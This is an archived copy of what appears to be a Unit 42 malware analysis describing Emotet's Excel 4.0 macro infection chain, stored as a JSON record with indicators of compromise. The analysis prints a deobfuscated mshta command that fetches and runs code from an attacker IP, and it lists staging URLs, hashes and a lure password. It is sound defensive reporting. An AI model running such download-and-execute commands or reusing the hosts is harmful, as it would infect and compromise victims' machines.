{
	"id": "52ea5dd0-b820-4474-bfe7-8b7faa9a2f10",
	"created_at": "2026-04-06T00:09:50.471888Z",
	"updated_at": "2026-04-10T03:20:23.208347Z",
	"deleted_at": null,
	"sha1_hash": "75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d",
	"title": "New Emotet Infection Method",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1201791,
	"plain_text": "New Emotet Infection Method\r\nBy Saqib Khanzada, Tyler Halfpop, Micah Yates, Brad Duncan\r\nPublished: 2022-02-15 · Archived: 2026-04-05 12:46:16 UTC\r\nExecutive Summary\r\nAs early as Dec. 21, 2021, Unit 42 observed a new infection method for the highly prevalent malware family\r\nEmotet. Emotet is high-volume malware that often changes and modifies its attack patterns. This latest\r\nmodification of the Emotet attack follows suit.\r\nThe new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro.\r\nWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of\r\nPowerShell to retrieve and execute the final Emotet payload.\r\nPalo Alto Networks customers are protected from Emotet and similar malware families using similar obfuscation\r\ntechniques with Cortex XDR or the Next-Generation Firewall with the WildFire and Threat Prevention security\r\nsubscriptions.\r\nHistory of Emotet\r\nEmotet was first discovered as a banking trojan in 2014, and it has been very active in recent years. In January\r\n2021, law enforcement and judicial agencies took down the Emotet botnet infrastructure, but Emotet returned in\r\nNovember 2021 and has remained active since then.\r\nEmotet frequently uses thread hijacking as part of its attack method. As described in our previous blog on\r\nEmotet’s thread hijacking, this technique generates fake replies based on legitimate emails stolen from mail clients\r\nof Windows hosts previously infected with Emotet. The botnet uses this stolen email data to create fake replies\r\nimpersonating the original senders.\r\nUsing thread hijacking and other types of emails, Emotet has implemented different infection methods since its\r\nreturn. Most notable were emails with links to install a fake Adobe Windows App Installer Package in December\r\n2021. After a holiday break, Emotet returned to attachment-based emails in January 2022. As early as Dec. 21,\r\n2021, Emotet started using a new infection method, which we describe in this blog.\r\nIn some cases, Emotet uses a password-protected zip archive as an attachment to its email. In other cases, Emotet\r\nuses an Excel spreadsheet directly attached to the email.\r\nExample of an Initial Email Lure\r\nShown in Figure 1, this example of an initial email lure sent by Emotet is a recent example of Emotet’s thread\r\nhijacking. The stolen email thread is from June 2021, and this email was sent by the Emotet botnet on Jan. 27,\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 1 of 7\n\n2022. This example contains an encrypted zip file in an attempt to bypass security systems. The password to the\r\nzip file is included in the email, so that the victim can extract the contents.\r\nFigure 1. Example of a thread-hijacked Emotet email lure sent on Jan. 27, 2022.\r\nExcel Document\r\nThe encrypted zip file contains a single Excel document with Excel 4.0 macros. These macros are an old Excel\r\nfeature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows\r\nhost before the malicious content is activated.\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 2 of 7\n\nFigure 2. Excel 4.0 macro document.\r\nWhen the macro code is enabled, it executes cmd.exe to run mshta.exe with an argument to retrieve and execute a\r\nremote HTML application. The code utilizes hex and character obfuscation in order to attempt to bypass static\r\ndetection measures. The deobfuscated command string that is executed is: cmd /c mshta\r\nhxxp://91.240.118[.]168/se/s.html\r\nFigure 3. Excel 4.0 macro code that executes cmd and mshta.\r\nThe HTML application shown in Figure 4 is highly obfuscated. It will download and execute additional\r\nPowerShell code.\r\nFigure 4. Obfuscated HTML application.\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 3 of 7\n\nPowerShell\r\nThe initial obfuscated PowerShell script shown in Figure 5 connects to hxxp://91.240.118[.]168/se/s.png. This\r\nURL returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\r\nFigure 5. Initial PowerShell downloader.\r\nThis second-stage PowerShell code shown in Figure 6 contains 14 URLs to retrieve the Emotet binary. The script\r\nattempts each URL until an Emotet binary is successfully downloaded. Having multiple URLs makes this attack\r\nmore resilient in the event that one of the URLs is taken down.\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 4 of 7\n\nFigure 6. HTTP traffic showing the second-stage PowerShell code.\r\nThe Emotet DLL loads an encrypted PE from its resource section as the final stage of this attack chain.\r\nFigure 7. Emotet DLL with an encrypted PE from its resource section.\r\nConclusion\r\nEmotet is a highly-active malware family that frequently changes its infection techniques. These changes are\r\nlikely an attempt to avoid detection. Emotet’s new attack chain reveals multiple stages with different file types and\r\nobfuscated script before arriving at the final Emotet payload.\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 5 of 7\n\nPalo Alto Networks customers are protected from malware families using similar obfuscation techniques with\r\nCortex XDR or the Next-Generation Firewall with WildFire and Threat Prevention security subscriptions.\r\nIndicators of Compromise\r\nAppendix A: Files From Emotet Email Lure on Jan. 27, 2022\r\nSHA256 hash: 9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9\r\nFile size: 40,929 bytes\r\nFile name: form.zip\r\nFile description: Password-protected encrypted zip archive seen on Jan. 27, 2022\r\nPassword: EHGWQARLC\r\nSHA256 hash: 6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88\r\nFile size: 77,989 bytes\r\nFile name: form.xlsm\r\nFile description: Excel file with Excel 4.0 macros extracted from the above zip archive\r\nAppendix B: PowerShell Script Seen on Jan. 27, 2022\r\nSHA256 hash: 9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1\r\nFile size: 10,986 bytes\r\nFile location: hxxp://91.240.118[.]168/se/s.html\r\nFile description: First-stage PowerShell script\r\nSHA256 hash: 5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed\r\nFile size: 1,353 bytes\r\nFile location: hxxp://91.240.118[.]168/se/s.png\r\nFile description: Second-stage PowerShell script\r\nAppendix C: URLs Hosting the Emotet DLL on Jan. 27, 2022\r\nhxxp://unifiedpharma[.]com/wp-content/5arxM/\r\nhxxp://hotelamerpalace[.]com/Fox-C404/LEPqPJpt4Gbr8BHAn/\r\nhxxps://connecticutsfinestmovers[.]com/Fox-C/mVwOqxT17gVWaE8E/\r\nhxxp://icfacn[.]com/runtime/n7qA2YStudp/\r\nhxxps://krezol-group[.]com:443/images/PmLGLKYeCBs5d/\r\nhxxp://ledcaopingdeng[.]com/wp-includes/Qq39yj7fpvk/\r\nhxxp://autodiscover.karlamejia[.]com/wp-admin/hcdnVlRIiwvTVrJjJEE/\r\nhxxps://crmweb[.]info:443/bitrix/rc9XjtwF/\r\nhxxp://accessunited-bank[.]com/admin/hzIgVwq8btak/\r\nhxxp://pigij[.]com/wp-admin/MVW5/\r\nhxxp://artanddesign[.]one/wp-content/uploads/A2cZL7/\r\nhxxp://strawberry.kids-singer[.]net/assets_c/WAdvNT84Dmu/\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 6 of 7\n\nhxxps://eleccom[.]shop:443/services/AEjSDj/\r\nhxxps://izocab[.]com/nashi-klienty/B5SC/\r\nAppendix D: Example of Emotet DLL on Jan. 27, 2022\r\nSHA256 hash: 2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f\r\nFile size: 516,096 bytes\r\nFile location: hxxp://unifiedpharma[.]com/wp-content/5arxM/\r\nFile location: C:\\Users\\Public\\Documents\\ssd.dll\r\nFile location: C:\\Users\\[username]\\AppData\\Local\\[random characters]\\[random characters].[random characters]\r\nRun method: rundll32.exe [filename],[any string]\r\nUpdated Feb. 15, 2022, to list earlier dates of initial observation of the infection method.\r\nSource: https://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-emotet-infection-method/"
	],
	"report_names": [
		"new-emotet-infection-method"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.pdf",
		"text": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.txt",
		"img": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.jpg"
	}
}